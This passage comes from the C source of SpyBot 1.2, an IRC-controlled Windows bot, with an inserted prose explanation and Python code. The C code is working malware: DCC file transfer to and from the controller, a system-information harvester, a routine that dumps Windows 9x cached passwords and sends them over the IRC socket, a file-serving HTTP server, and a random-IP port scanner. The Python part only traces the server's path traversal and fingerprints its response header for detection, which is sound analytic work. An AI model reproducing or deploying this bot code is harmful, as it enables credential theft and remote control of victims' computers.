1527 		send(sock, buf2, strlen(buf2), 0);
1528 		Sleep(1000);
1529 	}
1530 }
1531 #endif
1532 
1533 int dccsenderror(SOCKET sock,char *chan,char *buf)
1534 {
1535 	char buffer[4096];
1536 	strcat(buf,"\n\r");
1537 	memset(buffer,0,sizeof(buffer));
1538 	if (chan) sprintf(buffer,"PRIVMSG %s :%s",chan,buf);
1539 	else sprintf(buffer,buf);
1540 	send(sock,buffer,strlen(buffer),0);
1541 	return 0;
1542 }
1543 
1544 DWORD WINAPI dcc_chat(LPVOID param)
1545 {
1546 	char buffer[4096];
1547 	char host[20];
1548 	int port;
1549 	SOCKET ircsock;
1550 	ircsock = dcchosts;
1551 	sprintf(host,dcchost);
1552 	port = dccport;
1553 	int i;
1554 	char x[MAX_PATH];
1555 	info = TRUE;
1556 	char line[4096];
1557    	SOCKET dcc;
1558 	if ((dcc = create_sock(host,port)) == SOCKET_ERROR) return 0;
1559 	while (1) {
1560 		memset(buffer,0,sizeof(buffer));
1561 		if (recv( dcc, buffer, sizeof(buffer), 0) <= 0) 
1562 			return 1;
1563 		strncpy(line, buffer, sizeof(line)-1);
1564 		strtok(buffer, " ");
1565 		strtok(buffer,"\n");
1566 		strtok(line,"\n");
1567 		if (strlen(line) < 3) continue;
1568 		if (buffer == NULL) continue;
1569 		if (read_command(dcc,ircsock,buffer,line,NULL) == 1) {
1570 			WSACleanup();
1571 			exit(0);
1572 		}
1573 
1574 	}
1575 	closesocket(dcc);
1576 	return 0;
1577 }
1578 
1579 
1580 DWORD WINAPI dcc_send(LPVOID param)
1581 {
1582 	char buffer[4096];
1583 	DWORD err, err2;
1584    	SOCKET         dcc;
1585 	SOCKET         sock;
1586 	SOCKADDR_IN    GuestAddr;
1587 	SOCKADDR_IN    SockAddr;
1588 	char chan[50];	
1589 	memset(chan,0,sizeof(chan));
1590 	strcpy(chan,sendtochan);
1591 	char filename[MAX_PATH];
1592 	SOCKET sendsock;
1593 	sendsock = dcchosts;
1594 	strcpy(filename,dccfilename);
1595 	char sendbuf[512];  
1596 	memset(sendbuf,0,sizeof(sendbuf));
1597 	info = TRUE;
1598 	FILE *infile;
1599 	while (1) 
1600 	{
1601 		if ((dcc = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
1602       			sprintf(sendbuf,Error);
1603 			break;
1604 		}
1605 		memset(&SockAddr, 0, sizeof(SockAddr));
1606    		SockAddr.sin_family = AF_INET;
1607    		SockAddr.sin_port = htons(0);//random port
1608 		SockAddr.sin_addr.s_addr = INADDR_ANY;   
1609 		if (bind(dcc, (SOCKADDR *)&SockAddr, sizeof(SockAddr)) != 0) {
1610 			sprintf(sendbuf,Error);
1611 			break;
1612 		}
1613 		int length = sizeof(SockAddr);
1614 		getsockname(dcc, (SOCKADDR *)&SockAddr, &length);
1615 
1616 		short portnum = ntohs(SockAddr.sin_port);
1617 		char file[MAX_PATH];
1618 		for (int c=0;c<=strlen(filename);c++)
1619 		{
1620 			if (filename[c] == 32) file[c] = 95;
1621 			else file[c] = filename[c];
1622 		}
1623 
1624 		if (listen(dcc, 1) != 0) {
1625 			sprintf(sendbuf,Error);
1626 			break;
1627 		}
1628 		HANDLE testfile = CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
1629 		if (testfile == INVALID_HANDLE_VALUE) {
1630 			sprintf(sendbuf,No_File);
1631 			break;
1632 		}
1633 		length = GetFileSize(testfile,NULL);
1634 		CloseHandle(testfile);
1635 		infile = fopen(filename,"rb");
1636 		if (infile == NULL) {
1637       	    		sprintf(sendbuf,No_File);
1638 			break;
1639 		}
1640 		sprintf(sendbuf,"\001DCC SEND %s %i %i %i\001",file,htonl(inet_addr(IP)),portnum,length); // 0x01 bytes: CTCP delimiters
1641 		dccsenderror(sendsock,chan,sendbuf);
1642 		TIMEVAL time;
1643    		fd_set fd_struct;
1644     		time.tv_sec = 60;//timeout after 60 sec.
1645     		time.tv_usec = 0;
1646    		FD_ZERO(&fd_struct);
1647     		FD_SET(dcc, &fd_struct);
1648 		if (select(0, &fd_struct, NULL, NULL, &time) <= 0)
1649 		{
1650 			dccsenderror(sendsock,chan,"Dcc send timeout");
1651 			break;
1652 		}
1653 		int addrlen = sizeof(GuestAddr);
1654 		if ((sock = accept(dcc, (SOCKADDR *)&GuestAddr,&addrlen)) == INVALID_SOCKET)  {
1655 			sprintf(sendbuf,Error);
1656 			break;
1657 		} 
1658 		closesocket(dcc);
1659 		int c;
1660 		int count;
1661 		while (1)
1662 		{
1663 			memset(buffer,0,sizeof(buffer));
1664 			c = fread(buffer,1,sizeof(buffer),infile);
1665 			if (c == 0) 
1666 				break;
1667 			err = send(sock,buffer ,sizeof(buffer), 0);
1668 			err2 = recv(sock,buffer ,sizeof(buffer), 0); //the client MUST send the amount of bytes received; for now assume it equals the number of bytes sent
1669 			if (err == SOCKET_ERROR || err == 0 || err2 == SOCKET_ERROR || err2 == 0) {
1670 				fclose(infile);
1671 				dccsenderror(sendsock,chan,"Socket error");
1672 				closesocket(sock);
1673 				return 1;
1674 			}
1675 			count = count + err;
1676 			
1677 		}
1678 		memset(sendbuf,0,sizeof(sendbuf));
1679 		sprintf(sendbuf,"Transfer complete (send: %i bytes)",count);
1680 		fclose(infile);
1681 		break;
1682 	}
1683 	
1684 	dccsenderror(sendsock,chan,sendbuf);
1685 	closesocket(dcc);
1686 	closesocket(sock);
1687         return 0;
1688 }
1689 
1690 DWORD WINAPI dcc_getfile(LPVOID param)
1691 {
1692 	char buffer[4096];
1693 	char sendbuffer[512];
1694 	DWORD err;
1695    	SOCKET	dcc;
1696 	SOCKET	sock;
1697 	sock = dcchosts;
1698 	char chan[50];	
1699 	if (sendtochan != NULL) strcpy(chan,sendtochan);
1700 	char host[20];
1701 	int port;
1702 	port = dccport;
1703 	int received = 0;
1704 	unsigned long received2;
1705  	sprintf(host,dcchost);
1706 	char sysdir[MAX_PATH];
1707 	char filename[MAX_PATH];
1708 	GetSystemDirectory(sysdir, sizeof(sysdir));
1709 	sprintf(filename,"%s\\%s",sysdir,dccfilename);
1710 	info = TRUE;
1711 	FILE *infile;
1712 	memset(sendbuffer,0,sizeof(sendbuffer));
1713 	while (1) 
1714 	{
1715 		HANDLE testfile = CreateFile(filename,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
1716 		if (testfile == INVALID_HANDLE_VALUE) {
1717 			sprintf(sendbuffer,"Error with file");
1718 			break;
1719 		}
1720 		CloseHandle(testfile);
1721 		infile = fopen(filename,"a+b");
1722 		if (infile == NULL) {
1723 			sprintf(sendbuffer,"Error with file");
1724 			break;
1725 		}
1726 
1727 		if ((dcc = create_sock(host,port)) == SOCKET_ERROR) {
1728 			sprintf(sendbuffer,"Error connecting");
1729 			break;
1730 		}
1731 		err = 1;
1732 		while (err != 0) {
1733 			memset(buffer,0,sizeof(buffer));
1734 			err = recv( dcc, buffer, sizeof(buffer), 0);
1735 			if (err == 0) break;
1736 			if (err == SOCKET_ERROR) {
1737 				dccsenderror(sock,chan,"Socket error");
1738 				fclose(infile);
1739 				closesocket(dcc);
1740 				return 1;
1741 			}
1742 			fwrite(buffer,1,err,infile);
1743 			received = received + err;
1744 			received2 =  htonl(received);
1745 			send(dcc,(char *)&received2 , 4, 0);
1746 		}
1747 		sprintf(sendbuffer,"Transfer complete (size: %i bytes)",received);
1748 		break;
1749 	}
1750 	dccsenderror(sock,chan,sendbuffer);
1751 	if (infile != NULL) fclose(infile);
1752 	closesocket(dcc);
1753 	return 0;
1754 
1755 }
1756 
1757 // function used for sysinfo (thanks to sdbot)
1758  char * sysinfo(char *sinfo, SOCKET sock)
1759  {
1760 	int total;
1761 	MEMORYSTATUS memstat;
1762 	OSVERSIONINFO verinfo;
1763         LPTSTR lpszSystemInfo="???";
1764         DWORD cchBuff = 256;
1765 	memstat.dwLength = sizeof(MEMORYSTATUS);
1766 	GlobalMemoryStatus(&memstat); // load memory info into memstat
1767 	verinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); // required for some strange reason
1768 	GetVersionEx(&verinfo); // load version info into verinfo
1769 	char *os;
1770 	char os2[140];
1771 	if (verinfo.dwMajorVersion == 4 && verinfo.dwMinorVersion == 0) {
1772 		if (verinfo.dwPlatformId == VER_PLATFORM_WIN32_WINDOWS) os = "95";
1773 		if (verinfo.dwPlatformId == VER_PLATFORM_WIN32_NT) os = "NT";
1774 	}
1775 	else if (verinfo.dwMajorVersion == 4 && verinfo.dwMinorVersion == 10) os = "98";
1776 	else if (verinfo.dwMajorVersion == 4 && verinfo.dwMinorVersion == 90) os = "ME";
1777 	else if (verinfo.dwMajorVersion == 5 && verinfo.dwMinorVersion == 0) os = "2000";
1778 	else if (verinfo.dwMajorVersion == 5 && verinfo.dwMinorVersion == 1) os = "XP";
1779 	else os = "???";
1780 
1781 	if (verinfo.dwPlatformId == VER_PLATFORM_WIN32_NT && verinfo.szCSDVersion[0] != '\0') {
1782 		sprintf(os2, "%s [%s]", os, verinfo.szCSDVersion);
1783 		os = os2;
1784 	}
1785 
1786 	total = GetTickCount() / 1000; 
1787 
1788         if(!GetUserName(lpszSystemInfo, &cchBuff)) lpszSystemInfo = "?";
1789       	     
1790 	HOSTENT *hostent = NULL;
1791 	IN_ADDR iaddr;
1792 	DWORD addr = inet_addr(IP);
1793 
1794 	hostent = gethostbyaddr((char *)&addr, sizeof(struct in_addr), AF_INET);
1795 	char hostname[250];
1796 	if (hostent != NULL)
1797 		sprintf(hostname,hostent->h_name);
1798 	else sprintf(hostname,"couldn't resolve host");
1799 	char sysdir[MAX_PATH];
1800 	char windir[MAX_PATH];
1801 	GetSystemDirectory(sysdir,sizeof(sysdir));
1802 	GetWindowsDirectory(windir,sizeof(windir));
1803 	char date[70];
1804 	char time[70];
1805 	GetDateFormat(0x409,0,0,"dd:MMM:yyyy",date,70);
1806 	GetTimeFormat(0x409,0,0,"HH:mm:ss",time,70);
1807 	sprintf(sinfo, "Version:%s cpu: %dMHz. ram: %dMB total, %dMB free  %d%s in use os: Windows %s (%d.%d, build %d). uptime: %dd %dh %dm. Date: %s Time: %s Current user: %s IP address: %s Hostname: %s Windir: %s\\ Systemdir: %s\\",
1808 		Bot_Version,cpuspeed(), memstat.dwTotalPhys / 1048576, memstat.dwAvailPhys / 1048576,memstat.dwMemoryLoad,"%",
1809 		os, verinfo.dwMajorVersion, verinfo.dwMinorVersion, verinfo.dwBuildNumber, total / 86400, (total % 86400) / 3600, ((total % 86400) % 3600) / 60,date , time, lpszSystemInfo,IP,hostname,windir,sysdir);
1810 
1811 	return sinfo; // return the sysinfo string
1812  }
1813 
1814 // cpu speed function (thanks to sdbot)
1815  int cpuspeed(void)
1816  {
1817 	unsigned __int64 startcycle;
1818 	unsigned __int64 speed, num, num2;
1819 
1820 	do {
1821 		startcycle = cyclecount();
1822 		Sleep(1000);
1823 		//  speed = ((cyclecount()-startcycle)/100000)/10;
1824 		speed = (cyclecount() - startcycle) / 1000000; // FIXED
1825 
1826 	} while (speed > 1000000); 
1827 	return speed;
1828  }
1829 
1830 // asm for cpuspeed() (used for counting cpu cycles) (thanks to sdbot)
1831  unsigned __int64 cyclecount(void)
1832  {
1833 	unsigned __int64 count = 0;
1834 	_asm ("rdtsc\n"
1835 		  "mov %eax,%count\n");
1836 	return count;
1837 
1838  }
1839 
1840 
1841 //get passwords only win 9x ( i think i found this source on http://www.planet-source-code.com/ but im not sure)
1842 
1843 struct PASSWORD_CACHE_ENTRY {
1844 	WORD cbEntry;
1845 	WORD cbResource;
1846 	WORD cbPassword;
1847 	BYTE iEntry;
1848 	BYTE nType;
1849 	char abResource[1];
1850 };
1851 
1852 typedef BOOL (FAR PASCAL *CACHECALLBACK)( struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData );
1853 
1854 DWORD APIENTRY WNetEnumCachedPasswords(LPSTR pbPrefix,WORD cbPrefix,BYTE nType,CACHECALLBACK pfnCallback,DWORD dwRefData);
1855 
1856 typedef DWORD (WINAPI *ENUMPASSWORD)(LPSTR pbPrefix, WORD  cbPrefix, BYTE  nType, CACHECALLBACK pfnCallback, DWORD dwRefData);
1857 
1858 ENUMPASSWORD pWNetEnumCachedPasswords;
1859 
1860 typedef struct {
1861 	char *pBuffer;
1862 	int nBufLen;
1863 	int nBufPos;
1864 } PASSCACHECALLBACK_DATA;
1865 
1866 BOOL PASCAL AddPass(struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData)
1867 {
1868 	char buff[1024],buff2[1024];
1869 	int nCount;
1870 	PASSCACHECALLBACK_DATA *dat;
1871 	dat = (PASSCACHECALLBACK_DATA *)dwRefData;
1872 	nCount=pce->cbResource;
1873 	if(nCount>1023) nCount=1023;
1874 	lstrcpyn(buff, pce->abResource, nCount+1);
1875 	buff[nCount] = 0;
1876 	CharToOem(buff, buff2);
1877 	if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
1878 	lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
1879 	dat->nBufPos+=lstrlen(buff2)+1;
1880 
1881 	nCount=pce->cbPassword;
1882 	if(nCount>1023) nCount=1023;
1883 	lstrcpyn(buff, pce->abResource+pce->cbResource, nCount+1);
1884 	buff[nCount] = 0;
1885 	CharToOem(buff, buff2);
1886 	if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
1887 	lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
1888 	dat->nBufPos+=lstrlen(buff2)+1;
1889 
1890 	return TRUE;
1891 }
1892 int cashedpasswords(SOCKET sock,char *sendto)
1893 {
1894 	char sendbuf[2150];
1895 	char start[] = "Searsing for passwords";
1896 	HMODULE hLib=LoadLibrary("MPR.DLL");
1897 
1898 	PASSCACHECALLBACK_DATA dat;
1899 	dat.pBuffer=(char *)malloc(65536);
1900 	dat.nBufLen=65536;
1901 	dat.nBufPos=0;
1902 	pWNetEnumCachedPasswords = (ENUMPASSWORD)GetProcAddress(hLib, "WNetEnumCachedPasswords");
1903 	if (!pWNetEnumCachedPasswords)	{ //only win 9x!!
1904 		return 1;
1905 	}
1906 	pWNetEnumCachedPasswords(NULL, 0, 0xff, AddPass, (DWORD) &dat);
1907 	char *svStr;
1908 	svStr=dat.pBuffer;
1909 	if (sendto != NULL) sprintf(sendbuf,"PRIVMSG %s :%s\n\r",sendto,start);
1910 	else sprintf(sendbuf,"%s\n\r",start);
1911 	send(sock,sendbuf,strlen(sendbuf), 0);
1912 	do {
1913 		char *svRsc=svStr;
1914 		svStr+=lstrlen(svStr)+1;
1915 		char *svPwd=svStr;
1916 		svStr+=lstrlen(svStr)+1;
1917 		memset(sendbuf,0,sizeof(sendbuf));
1918 		if (sendto != NULL) sprintf(sendbuf,"PRIVMSG %s :%s %s\n\r",sendto, svRsc, svPwd);
1919 		else sprintf(sendbuf,"%s %s\n\r", svRsc, svPwd);
1920 		send(sock,sendbuf,strlen(sendbuf), 0);
1921 		if (sendto != NULL) Sleep(Flood_delay);
1922 	}while(*svStr!='\0');
1923 	FreeLibrary(hLib);
1924 	return 0;
1925 };
1926 
1927 
1928 
1929 ////////////////http server ////////////////////////////////////////////////////
1930 
1931 
1932 
1933 int HTTP_server(char *dir,int http_poort)
1934 {
1935 	DWORD id;
1936 	int c;
1937 	char buf[250];
1938 	HANDLE handle;
1939 	SOCKET HTTPServer;
1940 	char httpsDir[MAX_PATH];
1941 	memset(httpsDir,0,sizeof(httpsDir));
1942 	if (dir[strlen(dir)-1] == 92) dir[strlen(dir)-1] = '\0';
1943 	strcpy(httpsDir,dir);
1944 	if ((HTTPServer = Listen(http_poort)) == -1)
1945 		return -1;
1946 	for (c=0;c < 40;c++)
1947 		if (threads[c].id == 0) break;
1948 	if (c > 39) {
1949 		closesocket(HTTPServer);
1950 		return -1;
1951 	}
1952 	handle = CreateThread(NULL, 0, &HTTP_server_thread, (LPVOID)c, 0, &id);
1953 	if (handle != NULL) {
1954 		sprintf(buf,"HTTP server listining on poort: %i root dir: %s\\",http_poort,httpsDir);
1955 		addthread(buf,HTTPServer,handle,3,httpsDir);
1956 
1957 	}
1958 	return c;
1959 }
1960 
1961 DWORD WINAPI HTTP_server_thread(LPVOID Param) 
1962 {
1963 	int threadnum = (int)Param;
1964 	SOCKADDR_IN  GuestAddr;
1965 	SOCKET guest;
1966 	int c, sin_size, addrlen, max, i, err, b, r;
1967 	DWORD id;
1968 	unsigned long mode = 1;
1969 	char buffer[4096];
1970 	char rBuffer[4096];
1971 	char *file_to_send;
1972 	char file[MAX_PATH];
1973 	file_to_send = "\0";
1974 	if (ioctlsocket(threads[threadnum].sock,FIONBIO,&mode) == SOCKET_ERROR) 
1975 		return 1;
1976 
1977 	fd_set master;   
1978         fd_set temp; 
1979 	FD_ZERO(&master);    
1980         FD_ZERO(&temp);
1981  	FD_SET(threads[threadnum].sock, &master);
1982 	max = threads[threadnum].sock;
1983 
1984 	while (1)
1985     	{
1986 		temp = master;
1987 		if (select(max+1, &temp, NULL, NULL, NULL) == SOCKET_ERROR) {
1988 			break;
1989            	}
1990 		for(i = 0; i <= max; i++) {
1991                 	if (FD_ISSET(i, &temp)) { //there is something to do 
1992                     		if (i == threads[threadnum].sock) {
1993                     			//there is a new connection request
1994                         		addrlen = sizeof(GuestAddr);
1995                         		if ((guest = accept(threads[threadnum].sock, (SOCKADDR *)&GuestAddr,&addrlen)) == INVALID_SOCKET)  
1996                             			continue; 
1997 					else {
1998                            			FD_SET(guest, &master); // add to master set
1999                             			if (guest > max)  
2000                                		 		max = guest;
2001                         		}
2002                    		} 
2003 				else {
2004     					memset(buffer,0,sizeof(buffer));
2005 					memset(rBuffer,0,sizeof(rBuffer));
2006                         		if (recv(i, buffer, sizeof(buffer), 0) <= 0) { //socket error
2007                         			closesocket(i); 
2008                             			FD_CLR(i, &master); // remove from master set
2009                        			} 
2010 					else {
2011 						memset(file,0,sizeof(file));
2012 						for (b = 0,r = 0;b < strlen(buffer);b++, r++) {
2013 							rBuffer[r] = buffer[b];
2014 							if (buffer[b] == '\n')
2015 							{  //check the request....
2016 								if (strstr(rBuffer,"GET ") != NULL && strlen(rBuffer) > 5) { //look for a GET request
2017 									file_to_send = strtok(strstr(strstr(rBuffer,"GET ")," ")," ");
2018 									strcpy(file,file_to_send);
2019 
2020 								}
2021 								else if (strcmp(rBuffer,"\r\n") == 0) {  //end of the request check if there is anything to send back
2022 										FD_CLR(i, &master);
2023 										if (file != NULL) {
2024 										if (strlen(file)+strlen(threads[threadnum].dir) < MAX_PATH) { 
2025 											unsigned long mode2 = 0;
2026 											ioctlsocket(i,FIONBIO,&mode2);
2027 											Check_Requestedfile(i,threads[threadnum].dir,file);
2028 										}
2029 										else closesocket(i);
2030 									}
2031 									else closesocket(i);
2032 									break;
2033 								}
2034 								memset(rBuffer,0,sizeof(rBuffer));
2035 								r=-1;
2036 							}
2037 
2038                 				} 
2039         				}
2040 
2041 				}
2042 			}
2043 		}
2044 	}
2045 	closesocket(threads[threadnum].sock);
2046 	threads[threadnum].id = 0;
2047 	return 0;
2048 }
2049 
2050 SOCKET http_socket;
2051 BOOL http_Type;
2052 int http_lenght;
2053 BOOL http_info = FALSE;
2054 char http_file[MAX_PATH];
2055 char http_path[MAX_PATH];
2056 DWORD WINAPI  http_header(LPVOID param)
2057 {
2058 	SOCKET sock = (SOCKET)param;
2059 	char tFile[MAX_PATH];
2060 	char nFile[MAX_PATH];
2061 	BOOL type = http_Type;
2062 	sprintf(tFile,http_file); 
2063 	sprintf(nFile,http_path); 
2064 	int lenght = http_lenght;
2065 	http_info = TRUE;
2066 	char content[50];
2067 	if (type) sprintf(content,"text/html");
2068 	else sprintf(content,"application/octet-stream");
2069 	char buffer[4096];
2070 	char date[70];
2071 	char time[30];
2072 	GetDateFormat(0x409,0,0,"ddd, dd MMM yyyy",date,70);
2073 	GetTimeFormat(0x409,0,0,"HH:mm:ss",time,30);
2074 	sprintf(buffer,"HTTP/1.0 200 OK\r\nServer: SpyBot1.2\r\nDate: %s %s GMT\r\nContent-Type: %s\r\nAccept-Ranges: bytes\r\nLast-Modified: %s %s GMT\r\nContent-Length: %i\r\nConnection: close\r\n\r\n",date,time,content,date,time,lenght);
2075 	send(sock,buffer,strlen(buffer),0);
2076 	if (type == FALSE) http_send_file(sock,tFile);
2077 	else getfiles(tFile,sock,NULL,nFile); 
2078 	closesocket(sock);
2079 	return 0;
2080 }
2081 
2082 int Check_Requestedfile(SOCKET sock,char * dir,char * rFile)
2083 {
2084 	BOOL directory = FALSE;
2085 	char file[MAX_PATH];
2086 	char nFile[MAX_PATH];
2087 	char tFile[MAX_PATH];
2088 	memset(file,0,sizeof(file));
2089 	memset(nFile,0,sizeof(nFile));
2090 	DWORD c,d;
2091 
2092 	if (rFile[0] != 47) sprintf(file,"\\%s",rFile);
2093 	else {
2094 		rFile[0] = 92;
2095 		sprintf(file,"%s",rFile);
2096 	}
2097 	for (c = 0,d=0;c < strlen(file);c++,d++)
2098 	{
2099 		if ((((c+2 < strlen(file) && file[c] == 37 && file[c+1] == 50 && file[c+2] == 48)))) {
2100 			nFile[d] = 32;
2101 			c=c+2;
2102 		}
2103 		else if (file[c] == 47) nFile[d] = 92;
2104 		else nFile[d] = file[c];
2105 	}
2106 	sprintf(tFile,"%s%s",dir,nFile);
2107 	strtok(tFile,"\n");
2108 	HANDLE testfile;
2109 	if (GetFileAttributes(tFile) == FILE_ATTRIBUTE_DIRECTORY) 
2110       		directory = TRUE;
2111 	else if (GetFileAttributes(tFile) == 0xFFFFFFFF) { //invalid file
2112 			closesocket(sock);
2113 			return 0;
2114 	}
2115 	if (nFile[d-1] == 92) directory = TRUE;
2116 	DWORD id;
2117 	if (directory) {
2118 		strcat(tFile,"*");
2119 		file_to_html(nFile);
2120 		sprintf(http_file,tFile);
2121 		sprintf(http_path,nFile);
2122 		http_info = FALSE;
2123 		http_Type = TRUE;
2124 		http_lenght = 10000;
2125 		if (CreateThread(NULL, 0, &http_header, (LPVOID)sock, 0, &id)) {
2126 			while (http_info == FALSE) Sleep(5);
2127 		}
2128 		else { 
2129 			closesocket(sock);
2130 		}
2131 		 //(tFile,sock,NULL,nFile); //list the directory and send it in html
2132 	}
2133 	else { //its a file
2134 		HANDLE testfile = CreateFile(tFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
2135       		if (testfile != INVALID_HANDLE_VALUE) {
2136 			http_lenght = GetFileSize(testfile,NULL);
2137 			CloseHandle(testfile);
2138 			http_Type = FALSE;
2139 			sprintf(http_file,tFile);
2140 			http_info = FALSE;
2141 			if (CreateThread(NULL, 0, &http_header, (LPVOID)sock, 0, &id)) {
2142 				while (http_info == FALSE) Sleep(5);
2143 			}
2144 			else {
2145 				closesocket(sock);
2146 			}
2147 		}
2148 	}
2149 	return 0;
2150 }
2151 void http_send_file(SOCKET sock,char *file)
2152 {
2153 	FILE *infile;
2154 	int c, err;
2155 	char buffer[4096];
2156 	HANDLE testfile = CreateFile(file,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
2157 	if (testfile == INVALID_HANDLE_VALUE) 
2158 		return;
2159 	CloseHandle(testfile);
2160 	infile = fopen(file,"rb");
2161 	if (infile == NULL) 
2162 		return; //strange..
2163 	while (1) {
2164 		memset(buffer,0,sizeof(buffer));
2165 		c = fread(buffer,1,sizeof(buffer),infile);
2166 		if (c == 0) 
2167 			break;
2168 		err = send(sock,buffer ,c, 0);
2169 		if (err == SOCKET_ERROR || err == 0) 
2170 			break; //error
2171 	}
2172 	fclose(infile);
2173 	return; //file transfer complete		
2174 }
2175 
2176 char * file_to_html(char *file) //change the '\' back to '/'
2177 {
2178 	DWORD c;
2179 	for (c=0;c < strlen(file);c++)
2180 	if (file[c] == 92) file[c] = 47;
2181 	return file;
2182 }
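The HTTP server above takes the token after "GET " as the requested path, decodes only "%20", turns '/' into '\', appends the result to the configured root directory and hands it to GetFileAttributes/CreateFile; there is no handling of ".." segments, so they reach the filesystem unchanged, and only the combined length is checked against MAX_PATH. Every response carries "Server: SpyBot1.2", and directory listings are sent with a fixed Content-Length of 10000 regardless of their real size. The Python below is an added example, not part of the SpyBot source: it re-implements the path resolution so the file a request lands on can be checked without running the bot, and fingerprints the response header. The root directory, request lines and the response head used here are constructed.

```python
# Added example (not SpyBot code): path resolution of HTTP_server_thread() /
# Check_Requestedfile() and a response-header fingerprint for the bot's server.

MAX_PATH = 260  # Windows constant behind the bot's length check

# Constructed response head in the exact shape http_header() produces.
SAMPLE_RESPONSE = (
    "HTTP/1.0 200 OK\r\nServer: SpyBot1.2\r\nDate: Tue, 25 Feb 2014 10:00:00 GMT\r\n"
    "Content-Type: text/html\r\nAccept-Ranges: bytes\r\n"
    "Last-Modified: Tue, 25 Feb 2014 10:00:00 GMT\r\nContent-Length: 10000\r\n"
    "Connection: close\r\n\r\n"
)


def request_path(request_line: str):
    """HTTP_server_thread(): a line containing "GET " and longer than 5 bytes
    yields the token after the space following "GET" (strtok on ' ')."""
    if "GET " not in request_line or len(request_line) <= 5:
        return None
    rest = request_line[request_line.index("GET ") + 3:]  # strstr(strstr(buf,"GET ")," ")
    return rest.lstrip(" ").split(" ", 1)[0]              # strtok(rest, " ")


def resolve(root: str, rfile: str):
    """Check_Requestedfile(): returns (filesystem path, trailing-backslash
    directory flag), or None when the length check drops the request.
    Only "%20" is decoded and '/' is mapped to '\\'; ".." is passed through."""
    root = root[:-1] if root.endswith("\\") else root      # HTTP_server() drops one trailing '\'
    if len(rfile) + len(root) >= MAX_PATH:                 # check made before Check_Requestedfile()
        return None
    file = "\\" + (rfile[1:] if rfile.startswith("/") else rfile)
    out = []
    i = 0
    while i < len(file):
        if file.startswith("%20", i):
            out.append(" ")
            i += 3
        else:
            out.append("\\" if file[i] == "/" else file[i])
            i += 1
    nfile = "".join(out)
    tfile = (root + nfile).split("\n", 1)[0]               # strtok(tFile, "\n")
    return tfile, nfile.endswith("\\")


def spybot_http_fingerprint(response_head: str):
    """(looks like this bot's server, looks like one of its directory listings)."""
    headers = {}
    for h in response_head.split("\r\n")[1:]:
        if ": " in h:
            k, v = h.split(": ", 1)
            headers[k.lower()] = v
    is_bot = headers.get("server") == "SpyBot1.2"
    listing = (is_bot and headers.get("content-type") == "text/html"
               and headers.get("content-length") == "10000")
    return is_bot, listing


if __name__ == "__main__":
    path = request_path("GET /kazaabackupfiles/ HTTP/1.0\r\n")
    print(path, resolve("C:\\WINDOWS\\system32\\", path))
    print(resolve("C:\\WINDOWS\\system32", "/../../x.txt"))
    print(spybot_http_fingerprint(SAMPLE_RESPONSE))
```

resolve() reports what string the bot builds; whether a ".." in it actually leaves the root is then up to the Win32 file APIs, which receive the path as shown.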
2183 
2184 //port scanner
2185 DWORD WINAPI port_scanner(LPVOID param)
2186 {
2187 	int threadnum = (int)param;
2188 	scan[threadnum].state = 1;
2189 	char Scanning_ip[16];
2190 	char buf[4];
2191 	memset(Scanning_ip,0,sizeof(Scanning_ip));
2192 	memset(buf,0,sizeof(buf));
2193 	strcpy(Scanning_ip,scan[threadnum].ip);
2194 	DWORD c,token,d,err;
2195 	
2196 	//break the ip in 4 parts
2197 	for (d=0,c=0,token=0;c<=strlen(Scanning_ip);c++)
2198 	{
2199 		if  (Scanning_ip[c] == 46 || c == strlen(Scanning_ip)) {
2200 			srand(GetTickCount());
2201 			if (token == 0) { 
2202 				if (strcmp(buf,"x") == 0) scan[threadnum].scan_1 = (rand()%254);
2203 				else scan[threadnum].scan_1 = atoi(buf);
2204 
2205 			}
2206 			if (token == 1) {
2207 				if (strcmp(buf,"x") == 0) scan[threadnum].scan_2 = (rand()%254);
2208 				else scan[threadnum].scan_2 = atoi(buf);
2209 			}
2210 			if (token == 2) {
2211 				if (strcmp(buf,"x") == 0) scan[threadnum].scan_3 = (rand()%254);
2212 				scan[threadnum].scan_3 = atoi(buf);
2213 			}
2214 			if (token == 3) {
2215 				if (strcmp(buf,"x") == 0) scan[threadnum].scan_4 = (rand()%254);
2216 				 scan[threadnum].scan_4 = atoi(buf);
2217 			}
2218 			memset(buf,0,sizeof(buf));
2219 			d=0;
2220 			token++;
2221 			continue;
2222 		}
2223 		else {
2224 			buf[d] = Scanning_ip[c];
2225 			d++;
2226 		}
2227 	}
2228 	while (err != 1) 
2229 		err = scan_host(scan[threadnum].ip,scan[threadnum].port,threadnum);
2230 		
2231 	scan[threadnum].state = 0;
2232 	threads[scan[threadnum].thread].id = 0;
2233 	return 0;
2234 
2235 }
2236 
2237 int scan_host(char *host,int port,int num)
2238 {
2239 	char sendbuf[512];
2240 	SOCKADDR_IN    SockAddr;
2241    	SOCKET         sock[MAX_PORTSCAN_SOCKETS_TO_USE];
2242 	FILE *infile;
2243    	IN_ADDR iaddr;
2244 	memset(&SockAddr, 0, sizeof(SockAddr));
2245 	SockAddr.sin_family = AF_INET;
2246    	SockAddr.sin_port = htons(port);
2247 	DWORD mode = 1;
2248 	DWORD id;
2249 	TIMEVAL time;
2250 	int c;
2251 	for (c=0;c<MAX_PORTSCAN_SOCKETS_TO_USE;c++)
2252 	{
2253 		sock[c] = socket(AF_INET, SOCK_STREAM, 0);
2254    		if (sock[c] == INVALID_SOCKET)
2255       			return 1;
2256 		ioctlsocket(sock[c],FIONBIO,&mode);
2257 	}
2258 	for (c=0;c<MAX_PORTSCAN_SOCKETS_TO_USE;c++)
2259 	{
2260 		GetNewIp(num);
2261 		iaddr.s_addr = inet_addr(scan[num].ip);
2262 		if (iaddr.s_addr == INADDR_NONE)
2263 			return 0;
2264 		SockAddr.sin_addr = iaddr; 
